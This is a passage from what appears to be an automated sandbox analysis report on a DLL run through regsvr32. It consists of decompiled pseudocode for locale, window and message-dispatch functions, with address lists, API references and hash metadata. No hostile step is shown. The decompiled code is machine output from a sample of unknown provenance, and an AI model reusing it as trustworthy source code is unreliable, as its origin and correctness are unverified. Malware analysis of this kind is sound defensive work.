                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: State$LongMessageSendWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1063413437-0
                                                                                                            • Opcode ID: a3e213466f0cc79bb1ea557e72bfa32ef1c8a60120fac16cfa118bb559ebee9b
                                                                                                            • Instruction ID: eef2aa2a50f2ce3d6a27787399a9e196b8ce042d27520782e3c7ec791ce6f79c
                                                                                                            • Opcode Fuzzy Hash: a3e213466f0cc79bb1ea557e72bfa32ef1c8a60120fac16cfa118bb559ebee9b
                                                                                                            • Instruction Fuzzy Hash: F9F089B678039B1BF550B2748C41F952154CF4ABD6F010731B643EE4DACD65D8C15670
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10032820 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 88%
                                                                                                            			E10032820() {
				signed int _v8;
				char _v16;
				void* __esi;
				signed int _t8;
				intOrPtr* _t15;
				intOrPtr _t16;
				char _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;
				int _t25;
				signed int _t27;

				_t8 =  *0x10045580; // 0x8f64cb61
				_v8 = _t8 ^ _t27;
				_t24 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
					L4:
					_t25 = GetACP();
				} else {
					_t20 = _v16;
					_t15 =  &_v16;
					if(_t20 == 0) {
						goto L4;
					} else {
						do {
							_t15 = _t15 + 1;
							_t24 = _t24 * 0xa + _t20 - 0x30;
							_t20 =  *_t15;
						} while (_t20 != 0);
						if(_t24 == 0) {
							goto L4;
						}
					}
				}
				return E1001FBB5(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
			}















                                                                                                            0x10032826
                                                                                                            0x1003282d
                                                                                                            0x10032831
                                                                                                            0x1003284d
                                                                                                            0x1003286e
                                                                                                            0x10032874
                                                                                                            0x1003284f
                                                                                                            0x1003284f
                                                                                                            0x10032854
                                                                                                            0x10032857
                                                                                                            0x00000000
                                                                                                            0x10032859
                                                                                                            0x10032859
                                                                                                            0x1003285f
                                                                                                            0x10032860
                                                                                                            0x10032864
                                                                                                            0x10032866
                                                                                                            0x1003286c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1003286c
                                                                                                            0x10032857
                                                                                                            0x10032884

                                                                                                            APIs
                                                                                                            • GetThreadLocale.KERNEL32 ref: 10032833
                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10032845
                                                                                                            • GetACP.KERNEL32 ref: 1003286E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Locale$InfoThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 4232894706-0
                                                                                                            • Opcode ID: 8f0d28d75013055cb10158a0612970c0a9893228da2cd390bf36d54f26c36d1f
                                                                                                            • Instruction ID: c2008de266833c78ffcbd1f7b5091dc3b532eb19603803d402c2ea9d6af6b284
                                                                                                            • Opcode Fuzzy Hash: 8f0d28d75013055cb10158a0612970c0a9893228da2cd390bf36d54f26c36d1f
                                                                                                            • Instruction Fuzzy Hash: 39F0C231E012385FD712DB74CC65AAF77E4EF0AA82F11819DE981EB241DB20AD08C7D0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100084E6 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 79%
                                                                                                            			E100084E6(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E100083A5() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E1000849A( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x100482e4(_a4, _a8);
			}





                                                                                                            0x100084f3
                                                                                                            0x10008507
                                                                                                            0x1000851b
                                                                                                            0x10008533
                                                                                                            0x1000851d
                                                                                                            0x10008524
                                                                                                            0x10008524
                                                                                                            0x1000853b
                                                                                                            0x00000000
                                                                                                            0x1000853d
                                                                                                            0x00000000
                                                                                                            0x10008544
                                                                                                            0x1000853b
                                                                                                            0x00000000
                                                                                                            0x10008509
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f5040ab40e70315c2dbca04872de902a9a09ba11d6d5686e44c4fd55fea06db2
                                                                                                            • Instruction ID: e4924bfc53d2e17fd8ec0938dc174512458617aa0288f31416b22d4e1293315d
                                                                                                            • Opcode Fuzzy Hash: f5040ab40e70315c2dbca04872de902a9a09ba11d6d5686e44c4fd55fea06db2
                                                                                                            • Instruction Fuzzy Hash: 80F03731500909EAFF02DFA0CC48AAE3BB8FF042CAB40C020FC95D9069DB71DB949B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10027FFA Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E10027FFA(void* __eax, void* __ebx, void* __edx) {
				_Unknown_base(*)()* _t8;

				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
				_t8 = SetUnhandledExceptionFilter(E10025C66());
				 *0x10049228 = 0;
				return _t8;
			}




                                                                                                            0x10027fff
                                                                                                            0x1002800f
                                                                                                            0x10028015
                                                                                                            0x1002801c

                                                                                                            APIs
                                                                                                            • __decode_pointer.LIBCMT ref: 10028008
                                                                                                              • Part of subcall function 10025C66: TlsGetValue.KERNEL32(?,10025FF4,00000000,00000000,100208C6,00000000,?,?,00000001,?,?,1002092A,00000001,?,?,10041328), ref: 10025C73
                                                                                                              • Part of subcall function 10025C66: TlsGetValue.KERNEL32(00000006,?,10025FF4,00000000,00000000,100208C6,00000000,?,?,00000001,?,?,1002092A,00000001), ref: 10025C8A
                                                                                                              • Part of subcall function 10025C66: RtlDecodePointer.NTDLL(00000001,?,10025FF4,00000000,00000000,100208C6,00000000,?,?,00000001,?,?,1002092A,00000001), ref: 10025CBD
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1002800F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Value$DecodeExceptionFilterPointerUnhandled__decode_pointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 3433037573-0
                                                                                                            • Opcode ID: 3c9a6ff3b7cdb25ad6f78b02430afb574306ad8683ed00fcf6e17502d826d45d
                                                                                                            • Instruction ID: 3b32e5b9c4e5c339fa1c0dbd4148b0cbcea0ee2ce0a13854ea5d902e377eb68c
                                                                                                            • Opcode Fuzzy Hash: 3c9a6ff3b7cdb25ad6f78b02430afb574306ad8683ed00fcf6e17502d826d45d
                                                                                                            • Instruction Fuzzy Hash: ADC08C848083C02FEB01D3346ECC34C3A04E716001FF804F9D080C4153D8E880808129
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000C578 Relevance: 1.9, APIs: 1, Instructions: 445COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E1000C578(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				unsigned int _t147;
				signed int _t149;
				signed int* _t152;
				intOrPtr _t159;
				intOrPtr* _t160;
				unsigned int _t163;
				unsigned int _t166;
				signed int* _t170;
				signed int* _t173;
				unsigned int _t177;
				unsigned int _t181;
				unsigned int _t185;
				signed int _t189;
				signed int* _t194;
				signed int _t195;
				unsigned int _t196;
				intOrPtr* _t197;
				unsigned int _t198;
				signed int _t213;
				signed int _t217;
				unsigned int _t224;
				void* _t225;

				_t200 = __ecx;
				_push(0x70);
				E1001FBC4(E100336CE, __ebx, __edi, __esi);
				_t222 = __ecx;
				 *((intOrPtr*)(_t225 - 0x10)) = 0;
				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
				_t189 =  *(_t225 + 8);
				 *(_t225 - 4) = 0;
				if(_t189 != 0x111) {
					__eflags = _t189 - 0x4e;
					if(_t189 != 0x4e) {
						__eflags = _t189 - 6;
						_t224 =  *(_t225 + 0x10);
						if(_t189 == 6) {
							E1000BF47(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E1000A8F0(_t189, __ecx, _t225, _t224));
						}
						__eflags = _t189 - 0x20;
						if(_t189 != 0x20) {
							L12:
							_t147 =  *(_t222 + 0x4c);
							__eflags = _t147;
							if(_t147 == 0) {
								L20:
								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
								 *(_t225 + 0x10) = _t149;
								E100095AE(_t225 - 0x14, _t222, 7);
								_t194 = 0x10046ae0 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
								__eflags =  *(_t225 + 8) -  *_t194;
								 *(_t225 - 0x18) = _t194;
								if( *(_t225 + 8) !=  *_t194) {
									L25:
									_t152 =  *(_t225 - 0x18);
									_t195 =  *(_t225 + 0x10);
									 *_t152 =  *(_t225 + 8);
									_t152[2] = _t195;
									while(1) {
										__eflags =  *_t195;
										if( *_t195 == 0) {
											break;
										}
										__eflags =  *(_t225 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t225 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
											while(1) {
												_t196 = E10008DCB();
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
													( *(_t225 - 0x18))[1] = _t196;
													E100095DD(_t225 - 0x14);
													L102:
													_t197 =  *((intOrPtr*)(_t196 + 0x14));
													L103:
													_push(_t224);
													_push( *((intOrPtr*)(_t225 + 0xc)));
													L104:
													_t159 =  *_t197();
													L105:
													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
													goto L106;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t198 = _t196 + 0x18;
												__eflags = _t198;
												_push(_t198);
											}
											_t195 =  *(_t225 + 0x10);
											L36:
											_t195 =  *_t195();
											 *(_t225 + 0x10) = _t195;
											continue;
										}
										_push( *(_t225 + 8));
										_push( *((intOrPtr*)(_t195 + 4)));
										_t166 = E10008DCB();
										__eflags = _t166;
										 *(_t225 + 0x10) = _t166;
										if(_t166 == 0) {
											goto L36;
										}
										( *(_t225 - 0x18))[1] = _t166;
										E100095DD(_t225 - 0x14);
										L29:
										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
										__eflags = _t213 - 0x44;
										if(__eflags > 0) {
											goto L106;
										}
										switch( *((intOrPtr*)(_t213 * 4 +  &M1000CA90))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E1000FFD3(__ebx, __ecx, __edi, __esi, __eflags));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E1000A8F0(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L49;
											case 3:
												_push(__esi);
												__eax = E1000A8F0(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 5:
												__ecx = __ebp - 0x28;
												E1000FAE1(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E100095F7(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E1000A917(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eflags == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eflags != 0) {
														__ecx = __eax + 0x24;
														__eax = E1001251C(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eflags != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E1000B079(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E1000FAE1(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												_t95 = __ebp - 0x24;
												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
												__eflags =  *_t95;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E10010045(__ecx);
												goto L106;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E1000A8F0(__ebx, __ecx, __ebp, __esi);
												goto L61;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L103;
											case 0xa:
												_push(__esi);
												_push(E1000ED5E(__ebx, __ecx, __edi, __esi, __eflags));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L61:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L49:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0xb:
												_push(__esi);
												goto L87;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L90;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xe:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L81;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L81;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E1000A8F0(__ebx, __ecx, __ebp, __esi));
												L87:
												_push( *(__ebp + 0xc));
												goto L88;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0x13:
												_push(E1000A8F0(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
												_push(E1000A8F0(__ebx, __ecx, __ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
												goto L93;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E1000FFD3(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E1000ED5E(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x16:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												_push(__si);
												_push( *(__ebp + 0xc));
												__eax = E1000ED5E(__ebx, __ecx, __edi, __esi, __eflags);
												goto L93;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L75;
											case 0x18:
												_push(__esi);
												L75:
												__eax = E1000A8F0(__ebx, __ecx, __ebp);
												L76:
												_push(__eax);
												goto L90;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L79;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L79:
												_push(__eax);
												__eax = E1000A8F0(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L93;
											case 0x1b:
												_push(__esi);
												__eax = E1000A8F0(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												L81:
												_push(__eax);
												goto L88;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E1000A8F0(__ebx, __ecx, __ebp, __esi);
												goto L92;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x2a;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													L88:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L106;
												}
												_push(E1000A8F0(__ebx, __ecx, __ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L90:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L104;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L92:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L93:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t185;
												if(_t185 != 0) {
													goto L106;
												}
												goto L39;
											case 0x24:
												goto L106;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L106;
												}
												L39:
												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
												E100095DD(_t225 - 0x14);
												_t163 = 0;
												__eflags = 0;
												goto L40;
										}
									}
									_t170 =  *(_t225 - 0x18);
									_t58 =  &(_t170[1]);
									 *_t58 = _t170[1] & 0x00000000;
									__eflags =  *_t58;
									E100095DD(_t225 - 0x14);
									goto L39;
								}
								_t173 = _t194;
								__eflags =  *(_t225 + 0x10) - _t173[2];
								if( *(_t225 + 0x10) != _t173[2]) {
									goto L25;
								}
								_t196 = _t173[1];
								 *(_t225 + 0x10) = _t196;
								E100095DD(_t225 - 0x14);
								__eflags = _t196;
								if(_t196 == 0) {
									goto L39;
								}
								__eflags =  *(_t225 + 8) - 0xc000;
								if( *(_t225 + 8) < 0xc000) {
									goto L29;
								}
								goto L102;
							}
							__eflags =  *(_t147 + 0x74);
							if( *(_t147 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t189 - 0x200;
							if(_t189 < 0x200) {
								L16:
								__eflags = _t189 - 0x100;
								if(_t189 < 0x100) {
									L18:
									__eflags = _t189 - 0x281 - 0x10;
									if(_t189 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
									__eflags = _t177;
									if(_t177 != 0) {
										goto L106;
									}
									goto L20;
								}
								__eflags = _t189 - 0x10f;
								if(_t189 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t189 - 0x209;
							if(_t189 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t181 = E1000BFBD(_t189, _t222, _t222, _t224, _t224 >> 0x10);
							__eflags = _t181;
							if(_t181 != 0) {
								L2:
								 *((intOrPtr*)(_t225 - 0x10)) = 1;
								L106:
								_t160 =  *((intOrPtr*)(_t225 + 0x14));
								if(_t160 != 0) {
									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
								}
								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
								E100095DD(_t225 - 0x14);
								_t163 = 1;
								L40:
								return E1001FC9C(_t163);
							}
							goto L12;
						}
					}
					_t217 =  *(_t225 + 0x10);
					__eflags =  *_t217;
					if( *_t217 == 0) {
						goto L39;
					}
					_push(_t225 - 0x10);
					_push(_t217);
					_push( *((intOrPtr*)(_t225 + 0xc)));
					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L6;
				}
				_push( *(_t225 + 0x10));
				_push( *((intOrPtr*)(_t225 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L39;
				}
				goto L2;
			}

























                                                                                                            0x1000c578
                                                                                                            0x1000c578
                                                                                                            0x1000c57f
                                                                                                            0x1000c584
                                                                                                            0x1000c588
                                                                                                            0x1000c58b
                                                                                                            0x1000c592
                                                                                                            0x1000c59b
                                                                                                            0x1000c59e
                                                                                                            0x1000c5c2
                                                                                                            0x1000c5c5
                                                                                                            0x1000c5f1
                                                                                                            0x1000c5f4
                                                                                                            0x1000c5f7
                                                                                                            0x1000c604
                                                                                                            0x1000c604
                                                                                                            0x1000c609
                                                                                                            0x1000c60c
                                                                                                            0x1000c622
                                                                                                            0x1000c622
                                                                                                            0x1000c625
                                                                                                            0x1000c627
                                                                                                            0x1000c676
                                                                                                            0x1000c67a
                                                                                                            0x1000c687
                                                                                                            0x1000c690
                                                                                                            0x1000c69b
                                                                                                            0x1000c6a1
                                                                                                            0x1000c6a3
                                                                                                            0x1000c6a6
                                                                                                            0x1000c6d6
                                                                                                            0x1000c6d6
                                                                                                            0x1000c6d9
                                                                                                            0x1000c6df
                                                                                                            0x1000c6e1
                                                                                                            0x1000c770
                                                                                                            0x1000c770
                                                                                                            0x1000c773
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c6e9
                                                                                                            0x1000c6f0
                                                                                                            0x1000c6f2
                                                                                                            0x1000c6f4
                                                                                                            0x1000c738
                                                                                                            0x1000c73d
                                                                                                            0x1000c75b
                                                                                                            0x1000c760
                                                                                                            0x1000c762
                                                                                                            0x1000c764
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c746
                                                                                                            0x1000c748
                                                                                                            0x1000ca59
                                                                                                            0x1000ca5c
                                                                                                            0x1000ca61
                                                                                                            0x1000ca61
                                                                                                            0x1000ca64
                                                                                                            0x1000ca64
                                                                                                            0x1000ca65
                                                                                                            0x1000ca68
                                                                                                            0x1000ca6a
                                                                                                            0x1000ca6c
                                                                                                            0x1000ca6c
                                                                                                            0x00000000
                                                                                                            0x1000ca6c
                                                                                                            0x1000c74e
                                                                                                            0x1000c750
                                                                                                            0x1000c752
                                                                                                            0x1000c757
                                                                                                            0x1000c757
                                                                                                            0x1000c75a
                                                                                                            0x1000c75a
                                                                                                            0x1000c766
                                                                                                            0x1000c769
                                                                                                            0x1000c76b
                                                                                                            0x1000c76d
                                                                                                            0x00000000
                                                                                                            0x1000c76d
                                                                                                            0x1000c6f6
                                                                                                            0x1000c6f9
                                                                                                            0x1000c6fc
                                                                                                            0x1000c701
                                                                                                            0x1000c703
                                                                                                            0x1000c706
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c70b
                                                                                                            0x1000c711
                                                                                                            0x1000c716
                                                                                                            0x1000c71f
                                                                                                            0x1000c722
                                                                                                            0x1000c725
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c72b
                                                                                                            0x00000000
                                                                                                            0x1000c7ae
                                                                                                            0x1000c7b6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c7c0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000c7da
                                                                                                            0x1000c7dc
                                                                                                            0x1000c7dc
                                                                                                            0x1000c7df
                                                                                                            0x1000c7e0
                                                                                                            0x1000c7e3
                                                                                                            0x1000c7e7
                                                                                                            0x00000000
                                                                                                            0x00000000
